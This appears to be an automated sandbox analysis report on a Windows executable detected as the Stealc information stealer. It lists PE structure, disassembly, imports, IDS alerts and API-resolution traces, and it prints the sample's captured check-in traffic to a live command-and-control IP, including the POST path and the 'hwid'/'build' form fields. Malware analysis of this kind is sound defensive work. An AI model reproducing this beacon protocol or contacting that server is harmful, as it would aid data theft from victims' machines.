File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.v..l...l...l...>..#l...>...l...>..yl..$.c..l...l...l...>...l...>...l...>...l..Rich.l..................PE..L.....Be...........

File Icon


Icon Hash:	63396de971436e0f

Static PE Info

General

Entrypoint:	0x405d42
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6542B3EA [Wed Nov 1 20:24:10 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	258a3f6d5fd0fc3779b49a7e0f197d6b

Entrypoint Preview

Instruction
call 00007F9BBCB8A3EDh
jmp 00007F9BBCB866AEh
and dword ptr [00462AC4h], 00000000h
call 00007F9BBCB8A4C2h
mov dword ptr [00462AC4h], eax
xor eax, eax
ret
push ebp
mov ebp, esp
sub esp, 08h
and esp, FFFFFFF0h
fstp qword ptr [esp]
movq xmm0, qword ptr [esp]
call 00007F9BBCB8683Dh
leave
ret
movlpd xmm0, qword ptr [esp+04h]
pextrw eax, xmm0, 03h
and ax, 00007FFFh
sub ax, 00003030h
cmp ax, 000010C5h
ja 00007F9BBCB86978h
movlpd xmm1, qword ptr [00401A40h]
mulsd xmm1, xmm0
movlpd xmm2, qword ptr [00401A48h]
cvtsd2si edx, xmm1
addsd xmm1, xmm2
movlpd xmm3, qword ptr [00401A60h]
subsd xmm1, xmm2
movapd xmm2, dqword ptr [00401A50h]
mulsd xmm3, xmm1
unpcklpd xmm1, xmm1
add edx, 001C7610h
movsd xmm4, xmm0
and edx, 3Fh
movapd xmm5, dqword ptr [00401A30h]
lea eax, dword ptr [00401200h]
shl edx, 05h
add eax, edx
mulpd xmm2, xmm1
subsd xmm0, xmm3
mulsd xmm1, qword ptr [00401A68h]
subsd xmm4, xmm3
movlpd xmm7, qword ptr [eax+08h]
unpcklpd xmm0, xmm0

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x569c4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x65000	0x8318	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4968	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x198	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x56322	0x56400	e3201bdf74ecb9c87968aa2e0cf90eaf	False	0.6262341485507247	data	6.2765580710178766	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x58000	0xaad0	0x6000	0571cf561a79beea84089f2e648af719	False	0.07694498697916667	dBase III DBT, next free block index 7565155	0.8861972360055643	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dipo	0x63000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.puwuxu	0x64000	0xd6	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x65000	0x1ea318	0x8400	f8b8e63658d20b04e6f1361c1b07c0eb	False	0.32256155303030304	data	4.122447192936192	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x68580	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x69428	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x69cd0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x6a268	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x6b110	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x6b9b8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x65420	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5339861751152074
RT_ICON	0x65420	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5339861751152074
RT_ICON	0x65ae8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.41244813278008297
RT_ICON	0x65ae8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.41244813278008297
RT_ICON	0x68090	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.449468085106383
RT_ICON	0x68090	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.449468085106383
RT_STRING	0x6c160	0x4d4	data	Tamil	India	0.4401294498381877
RT_STRING	0x6c160	0x4d4	data	Tamil	Sri Lanka	0.4401294498381877
RT_STRING	0x6c638	0x372	data	Tamil	India	0.4614512471655329
RT_STRING	0x6c638	0x372	data	Tamil	Sri Lanka	0.4614512471655329
RT_STRING	0x6c9b0	0x4bc	data	Tamil	India	0.45957095709570955
RT_STRING	0x6c9b0	0x4bc	data	Tamil	Sri Lanka	0.45957095709570955
RT_STRING	0x6ce70	0x4a2	data	Tamil	India	0.4494097807757167
RT_STRING	0x6ce70	0x4a2	data	Tamil	Sri Lanka	0.4494097807757167
RT_ACCELERATOR	0x68528	0x58	data	Tamil	India	0.7954545454545454
RT_ACCELERATOR	0x68528	0x58	data	Tamil	Sri Lanka	0.7954545454545454
RT_GROUP_CURSOR	0x6a238	0x30	data			0.9375
RT_GROUP_CURSOR	0x6bf20	0x30	data			0.9166666666666666
RT_GROUP_ICON	0x684f8	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0x684f8	0x30	data	Tamil	Sri Lanka	0.9375
RT_VERSION	0x6bf50	0x210	data			0.5454545454545454

Imports

DLL

Import

KERNEL32.dll

GetTempFileNameW, GlobalMemoryStatus, WriteConsoleInputW, TlsGetValue, InterlockedIncrement, EnumCalendarInfoW, OpenJobObjectA, InterlockedDecrement, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, GetSystemDefaultLCID, OutputDebugStringW, GetModuleHandleW, FindNextVolumeMountPointA, GetDllDirectoryW, EnumTimeFormatsA, LoadLibraryW, GetVersionExW, GetFileAttributesA, GetTimeFormatW, SetMessageWaitingIndicator, GetModuleFileNameW, SetComputerNameExW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, SetComputerNameA, LoadLibraryA, InterlockedExchangeAdd, GetCommMask, FreeEnvironmentStringsW, OpenEventW, SetFileShortNameA, GetDiskFreeSpaceExA, ReadConsoleInputW, TlsAlloc, DeleteTimerQueueTimer, GetCurrentProcessId, SetFileAttributesW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, SetFilePointer, HeapFree, CloseHandle, GetEnvironmentStringsW, GetCommandLineW, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetModuleHandleA, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RaiseException, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-26T00:12:04.230634+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49707	92.255.57.88	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 00:12:02.264698982 CET	49707	80	192.168.2.6	92.255.57.88
Nov 26, 2024 00:12:02.384727955 CET	80	49707	92.255.57.88	192.168.2.6
Nov 26, 2024 00:12:02.384943008 CET	49707	80	192.168.2.6	92.255.57.88
Nov 26, 2024 00:12:02.385478020 CET	49707	80	192.168.2.6	92.255.57.88
Nov 26, 2024 00:12:02.505430937 CET	80	49707	92.255.57.88	192.168.2.6
Nov 26, 2024 00:12:03.769417048 CET	80	49707	92.255.57.88	192.168.2.6
Nov 26, 2024 00:12:03.769550085 CET	49707	80	192.168.2.6	92.255.57.88
Nov 26, 2024 00:12:03.773658991 CET	49707	80	192.168.2.6	92.255.57.88
Nov 26, 2024 00:12:03.893650055 CET	80	49707	92.255.57.88	192.168.2.6
Nov 26, 2024 00:12:04.230536938 CET	80	49707	92.255.57.88	192.168.2.6
Nov 26, 2024 00:12:04.230633974 CET	49707	80	192.168.2.6	92.255.57.88
Nov 26, 2024 00:12:09.235873938 CET	80	49707	92.255.57.88	192.168.2.6
Nov 26, 2024 00:12:09.235927105 CET	49707	80	192.168.2.6	92.255.57.88
Nov 26, 2024 00:12:10.969650030 CET	49707	80	192.168.2.6	92.255.57.88

HTTP Request Dependency Graph

92.255.57.88

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	92.255.57.88	80	2528	C:\Users\user\Desktop\X4roU7TtF1.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 00:12:02.385478020 CET	87	OUT	GET / HTTP/1.1 Host: 92.255.57.88 Connection: Keep-Alive Cache-Control: no-cache
Nov 26, 2024 00:12:03.769417048 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:12:03 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 26, 2024 00:12:03.773658991 CET	415	OUT	POST /7bbacc20a3bd2eb5.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAF Host: 92.255.57.88 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 36 39 39 38 44 43 33 30 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 2d 2d 0d 0a Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="hwid"376998DC30231817704571------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="build"551488411------ECBKKKFHCFIDHIECGCAF--
Nov 26, 2024 00:12:04.230536938 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:12:04 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	18:12:00
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\X4roU7TtF1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\X4roU7TtF1.exe"
Imagebase:	0x400000
File size:	414'208 bytes
MD5 hash:	73ADCB1012B382B6194C34B5CF277C9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2192748426.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2109975602.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:12:03
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1076
Imagebase:	0x590000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	73.4%
Signature Coverage:	19.7%
Total number of Nodes:	1233
Total number of Limit Nodes:	29

Executed Functions

Function 004268F0 Relevance: 214.2, APIs: 115, Strings: 7, Instructions: 696
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00906510), ref: 00426905
GetProcAddress.KERNEL32(76210000,009065B0), ref: 0042691D
GetProcAddress.KERNEL32(76210000,00909588), ref: 00426936
GetProcAddress.KERNEL32(76210000,009095A0), ref: 0042694E
GetProcAddress.KERNEL32(76210000,009095B8), ref: 00426966
GetProcAddress.KERNEL32(76210000,009096F0), ref: 0042697F
GetProcAddress.KERNEL32(76210000,0090B710), ref: 00426997
GetProcAddress.KERNEL32(76210000,00909690), ref: 004269AF
GetProcAddress.KERNEL32(76210000,00909708), ref: 004269C8
GetProcAddress.KERNEL32(76210000,009096D8), ref: 004269E0
GetProcAddress.KERNEL32(76210000,00909648), ref: 004269F8
GetProcAddress.KERNEL32(76210000,00906610), ref: 00426A11
GetProcAddress.KERNEL32(76210000,00906870), ref: 00426A29
GetProcAddress.KERNEL32(76210000,00906650), ref: 00426A41
GetProcAddress.KERNEL32(76210000,00906790), ref: 00426A5A
GetProcAddress.KERNEL32(76210000,00909660), ref: 00426A72
GetProcAddress.KERNEL32(76210000,009096C0), ref: 00426A8A
GetProcAddress.KERNEL32(76210000,0090B468), ref: 00426AA3
GetProcAddress.KERNEL32(76210000,00906670), ref: 00426ABB
GetProcAddress.KERNEL32(76210000,00909678), ref: 00426AD3
GetProcAddress.KERNEL32(76210000,009096A8), ref: 00426AEC
GetProcAddress.KERNEL32(76210000,0090FDB0), ref: 00426B04
GetProcAddress.KERNEL32(76210000,0090FF90), ref: 00426B1C
GetProcAddress.KERNEL32(76210000,009067D0), ref: 00426B35
GetProcAddress.KERNEL32(76210000,0090FED0), ref: 00426B4D
GetProcAddress.KERNEL32(76210000,0090FE70), ref: 00426B65
GetProcAddress.KERNEL32(76210000,0090FE40), ref: 00426B7E
GetProcAddress.KERNEL32(76210000,0090FE88), ref: 00426B96
GetProcAddress.KERNEL32(76210000,0090FF60), ref: 00426BAE
GetProcAddress.KERNEL32(76210000,0090FFA8), ref: 00426BC7
GetProcAddress.KERNEL32(76210000,0090FEA0), ref: 00426BDF
GetProcAddress.KERNEL32(76210000,00910068), ref: 00426BF7
GetProcAddress.KERNEL32(76210000,0090FDC8), ref: 00426C10
GetProcAddress.KERNEL32(76210000,0090C840), ref: 00426C28
GetProcAddress.KERNEL32(76210000,0090FFC0), ref: 00426C40
GetProcAddress.KERNEL32(76210000,0090FEB8), ref: 00426C59
GetProcAddress.KERNEL32(76210000,00906890), ref: 00426C71
GetProcAddress.KERNEL32(76210000,0090FDE0), ref: 00426C89
GetProcAddress.KERNEL32(76210000,009068B0), ref: 00426CA2
GetProcAddress.KERNEL32(76210000,0090FE58), ref: 00426CBA
GetProcAddress.KERNEL32(76210000,0090FEE8), ref: 00426CD2
GetProcAddress.KERNEL32(76210000,00906550), ref: 00426CEB
GetProcAddress.KERNEL32(76210000,00906570), ref: 00426D03
LoadLibraryA.KERNEL32(00910038,004206EF,?,00422075), ref: 00426D15
LoadLibraryA.KERNEL32(0090FF00,?,00422075), ref: 00426D26
LoadLibraryA.KERNEL32(0090FF18,?,00422075), ref: 00426D38
LoadLibraryA.KERNEL32(0090FF30,?,00422075), ref: 00426D4A
LoadLibraryA.KERNEL32(0090FF48,?,00422075), ref: 00426D5B
LoadLibraryA.KERNEL32(0090FFD8,?,00422075), ref: 00426D6D
LoadLibraryA.KERNEL32(0090FF78,?,00422075), ref: 00426D7F
LoadLibraryA.KERNEL32(0090FFF0,?,00422075), ref: 00426D90
GetProcAddress.KERNEL32(751E0000,00906390), ref: 00426DAC
GetProcAddress.KERNEL32(751E0000,00910008), ref: 00426DC4
GetProcAddress.KERNEL32(751E0000,00908F50), ref: 00426DDD
GetProcAddress.KERNEL32(751E0000,00910020), ref: 00426DF5
GetProcAddress.KERNEL32(751E0000,00906210), ref: 00426E0D
GetProcAddress.KERNEL32(73FB0000,0090B5D0), ref: 00426E2D
GetProcAddress.KERNEL32(73FB0000,00906170), ref: 00426E45
GetProcAddress.KERNEL32(73FB0000,0090B558), ref: 00426E5E
GetProcAddress.KERNEL32(73FB0000,0090FDF8), ref: 00426E76
GetProcAddress.KERNEL32(73FB0000,00910050), ref: 00426E8E
GetProcAddress.KERNEL32(73FB0000,00906430), ref: 00426EA7
GetProcAddress.KERNEL32(73FB0000,009064B0), ref: 00426EBF
GetProcAddress.KERNEL32(73FB0000,0090FD80), ref: 00426ED7
GetProcAddress.KERNEL32(753A0000,009061B0), ref: 00426EF3
GetProcAddress.KERNEL32(753A0000,009062F0), ref: 00426F0B
GetProcAddress.KERNEL32(753A0000,0090FD98), ref: 00426F24
GetProcAddress.KERNEL32(753A0000,0090FE28), ref: 00426F3C
GetProcAddress.KERNEL32(753A0000,00906310), ref: 00426F54
GetProcAddress.KERNEL32(76310000,0090B788), ref: 00426F74
GetProcAddress.KERNEL32(76310000,0090B828), ref: 00426F8C
GetProcAddress.KERNEL32(76310000,0090FE10), ref: 00426FA5
GetProcAddress.KERNEL32(76310000,009061D0), ref: 00426FBD
GetProcAddress.KERNEL32(76310000,00906490), ref: 00426FD5
GetProcAddress.KERNEL32(76310000,0090B8C8), ref: 00426FEE
GetProcAddress.KERNEL32(76910000,00910110), ref: 0042700E
GetProcAddress.KERNEL32(76910000,00906230), ref: 00427026
GetProcAddress.KERNEL32(76910000,00909010), ref: 0042703F
GetProcAddress.KERNEL32(76910000,009100C8), ref: 00427057
GetProcAddress.KERNEL32(76910000,00910128), ref: 0042706F
GetProcAddress.KERNEL32(76910000,00906250), ref: 00427088
GetProcAddress.KERNEL32(76910000,00906450), ref: 004270A0
GetProcAddress.KERNEL32(76910000,009100F8), ref: 004270B8
GetProcAddress.KERNEL32(76910000,00910140), ref: 004270D1
GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 004270E7
GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 004270FE
GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00427115
GetProcAddress.KERNEL32(75B30000,00906270), ref: 00427131
GetProcAddress.KERNEL32(75B30000,00910080), ref: 00427149
GetProcAddress.KERNEL32(75B30000,00910098), ref: 00427162
GetProcAddress.KERNEL32(75B30000,009100E0), ref: 0042717A
GetProcAddress.KERNEL32(75B30000,009100B0), ref: 00427192
GetProcAddress.KERNEL32(75670000,00906190), ref: 004271AE
GetProcAddress.KERNEL32(75670000,00906290), ref: 004271C6
GetProcAddress.KERNEL32(76AC0000,009064F0), ref: 004271E2
GetProcAddress.KERNEL32(76AC0000,009103C8), ref: 004271FA
GetProcAddress.KERNEL32(6F4E0000,009062D0), ref: 0042721A
GetProcAddress.KERNEL32(6F4E0000,009063B0), ref: 00427232
GetProcAddress.KERNEL32(6F4E0000,00906110), ref: 0042724B
GetProcAddress.KERNEL32(6F4E0000,00910290), ref: 00427263
GetProcAddress.KERNEL32(6F4E0000,009063D0), ref: 0042727B
GetProcAddress.KERNEL32(6F4E0000,00906330), ref: 00427294
GetProcAddress.KERNEL32(6F4E0000,009061F0), ref: 004272AC
GetProcAddress.KERNEL32(6F4E0000,009063F0), ref: 004272C4
GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 004272DB
GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 004272F2
GetProcAddress.KERNEL32(75AE0000,00910470), ref: 0042730E
GetProcAddress.KERNEL32(75AE0000,00909100), ref: 00427326
GetProcAddress.KERNEL32(75AE0000,00910380), ref: 0042733F
GetProcAddress.KERNEL32(75AE0000,00910260), ref: 00427357
GetProcAddress.KERNEL32(76300000,00906410), ref: 00427373
GetProcAddress.KERNEL32(6D440000,009103E0), ref: 0042738F
GetProcAddress.KERNEL32(6D440000,00906130), ref: 004273A7
GetProcAddress.KERNEL32(6D440000,009102C0), ref: 004273C0
GetProcAddress.KERNEL32(6D440000,009101B8), ref: 004273D8

Strings

InternetSetOptionA, xrefs: 004272D0
CreateDesktopA, xrefs: 004270E1
CloseDesktop, xrefs: 0042710A
HttpQueryInfoA, xrefs: 004272E7
1#v, xrefs: 00426BEB
OpenDesktopA, xrefs: 004270F3
P2#v, xrefs: 00426AF8

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA$P2#v$1#v
API String ID: 2238633743-2455241328
Opcode ID: 2883cf5092a06c1f654f1ea880dfa72b03916e22f0cb699bb160642ada8bd00a
Instruction ID: a2e4a68e25a8a5b5ebc6ca9ee8fb4e22e77819d7a8dd759769c50ea34b46318c
Opcode Fuzzy Hash: 2883cf5092a06c1f654f1ea880dfa72b03916e22f0cb699bb160642ada8bd00a
Instruction Fuzzy Hash: E8625EB9A103009FD758DF65ED88AA637BBF789345310A91DF95683364DBB4A800DFB0

Function 00404C50 Relevance: 112.8, APIs: 61, Strings: 3, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00404C7F
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404CD2
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D05
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D35
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D73
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404DA6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DB6

Strings

", xrefs: 00405224, 00405312
------, xrefs: 00404EDC, 00404F09, 0040518B, 0040527C
_B, xrefs: 00404C53, 00404C67

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------$_B
API String ID: 2041821634-1334066325
Opcode ID: f9b5ee0828eeb08d638c15d6e05daf7b961394e85185aae0b524d5399b66751f
Instruction ID: 1552433d623cc160f1fdc82636420e70867d0f7256f5daceb05b59e833827d7b
Opcode Fuzzy Hash: f9b5ee0828eeb08d638c15d6e05daf7b961394e85185aae0b524d5399b66751f
Instruction Fuzzy Hash: 64528E71A002169BDB21EBA5DD89A9F7BB5AF44304F14103AF905B72D1DB78EC418FE8

Function 00404A60 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A74
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A82
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A89
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A90
GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
RtlAllocateHeap.NTDLL(00000000), ref: 00404AA2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AC0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AC7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ACE
